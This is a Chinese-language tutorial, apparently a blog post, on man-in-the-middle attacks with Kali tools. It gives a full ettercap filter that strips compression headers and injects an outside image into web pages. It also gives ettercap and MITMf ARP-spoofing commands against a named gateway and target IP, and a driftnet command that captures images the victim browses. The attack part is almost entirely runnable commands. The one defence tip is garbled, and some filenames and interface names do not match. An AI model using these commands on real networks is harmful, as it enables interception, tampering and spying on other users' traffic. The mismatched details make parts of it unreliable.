
先利用vim新建一个 kali.filter
写入下面代码并保存
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
#note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
msg("Filter Ran.\n");
}将其转变为二进制文件
etterfilter kali.filter -o kali.ef执行命令
ettercap -T -q -F ig.ef -M ARP /目标ip///效果如下

首先在root下创建一个img的文件夹,在文件夹中放入图片。
执行命令
python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202 --imgrand --img-dir /root/imgPS: 192.168.5.1 为路由器网关 192.168.5.202 为目标。
访问某宝效果如下:

python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202
python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202 --upsidedownternet
其他命令可以参考官网,这里不在演示。
在通过ettercap进行中间人攻击后,我们可以利用driftnet来获取对方浏览的图片。命令如下:
driftnet -i waln0可以在路由器防火墙中开启arp攻击,来防御中间人攻击。

参考文章:
Mitmf 是一款用来进行中间人攻击的工具。它可以结合 beef 一起来使用,并利用 beef 强大的 hook ...